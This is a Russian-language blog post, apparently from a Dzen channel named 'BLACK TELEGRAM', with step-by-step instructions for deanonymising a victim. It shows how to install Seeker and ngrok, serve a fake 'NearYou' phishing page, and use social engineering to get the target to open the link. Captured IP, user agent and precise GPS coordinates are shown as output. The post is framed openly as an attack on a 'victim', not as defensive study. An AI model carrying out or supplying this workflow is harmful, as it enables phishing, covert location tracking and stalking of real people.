Найти в Дзене
BLACK TELEGRAM
21 подписчик

Black telegram

41
2 мин
Для деанонимизации достаточно использовать утилиту Seeker (местоположение, IP, OS, количество ядер процессора, CPU, GPU. браузер). Что это такое и с чем ее едят? Об этом ниже.
Как это работает? Запускаем фишинговый сайт, скидываем его жертве, с помощью СИ заставляем перейти. Он переходит, мы получаем IP и т.д. Если даёт доступ к геолокации, то получаем точное месторасположение. Нам нужно Сам seeker + ngrok. Атаку произведем с Kali Linux. Установка Seeker: sudo apt update sudo apt install python3 python3-pip php ssh git pip3 install requests git clone https://github.com/thewhiteh4t/seeker cd seeker/ python3 ./seeker.py -h Установка Ngrok: wget `curl -s https://ngrok.com/download | grep -o -E 'https://bin.equinox.io/c/[A-Za-z0-9]{4,}/ngrok-stable-linux-amd64.zip'` unzip ngrok-stable-linux-amd64.zip chmod +x ./ngrok ./ngrok -h Seeker Запускаем seeker: python3 ./seeker.py -t manual Если при попытке запуска встроенного PHP сервера у вас возникли проблемы, то посмотрите содержимое файла ./l
Оглавление

Для деанонимизации достаточно использовать утилиту Seeker (местоположение, IP, OS, количество ядер процессора, CPU, GPU. браузер). Что это такое и с чем ее едят? Об этом ниже.

Как это работает?

Запускаем фишинговый сайт, скидываем его жертве, с помощью СИ заставляем перейти. Он переходит, мы получаем IP и т.д. Если даёт доступ к геолокации, то получаем точное месторасположение.

Нам нужно

Сам seeker + ngrok. Атаку произведем с Kali Linux.

Установка Seeker:

sudo apt update
sudo apt install python3 python3-pip php ssh git
pip3 install requests
git clone https://github.com/thewhiteh4t/seeker
cd seeker/
python3 ./seeker.py -h

Установка Ngrok:

wget `curl -s https://ngrok.com/download | grep -o -E 'https://bin.equinox.io/c/[A-Za-z0-9]{4,}/ngrok-stable-linux-amd64.zip'`
unzip ngrok-stable-linux-amd64.zip
chmod +x ./ngrok
./ngrok -h

Seeker

Запускаем seeker:

python3 ./seeker.py -t manual

Если при попытке запуска встроенного PHP сервера у вас возникли проблемы, то посмотрите содержимое файла ./logs/php.log.

На выбор присутствует два готовых шаблона:

 [1] NearYou

[2] Google Drive

Выбираю первый.

Затем выводится информация:

[+] Starting PHP Server......[ Success ]

[+] Waiting for User Interaction...

-2

В ней говорят, что PHP сервер запущен и ожидается взаимодействие с пользователем. Идем дальше.
Для создания тоннеля из интернета до нашего локального сервера, в другом окне запускаем ngrok:

./ngrok http 8080
-3

Получаем сгенерированную ссылку  https://1fa595b3.ngrok.io.
Кидаем ее жертве. Если пользователь открыл ссылку на настольном компьютере, он увидит следующее:

-4

Страница выглядит весьма профессионально. Надписи говорят о том, что этот сервис позволяет найти людей рядом с вами и завести новых друзей. Допустим, пользователь нажал кнопку «Continue»:

-5

Возникает запрос на доступ к местоположению.

В окне seeker мы видим следующее:

-6

Мы получили IP и User Agent пользователя, но данные о местоположении не получены -- у компьютера нет GPS модуля:

[-] Location information is unavailable

Откроем теперь фишинговую ссылку на мобильном телефоне.

-7

Запрос данных о местоположении:

-8

В этот раз получены данные локации:

[+] Location Information :

[+] Latitude  : 12.458610728197513 deg

[+] Longitude : 99.97342079401619 deg

[+] Accuracy  : 3.4233226776123047 m

[+] Altitude  : 65.55902099609375

[+] Direction : Not Available

[+] Speed     : 0.23704902827739716 m/s

-9

Ссылка на гугл карты: https://www.google.com/maps/place/12.458610728197513+99.97342079401619

Также сказано, что данные сохранены в файл по пути ./seeker/db/results.csv.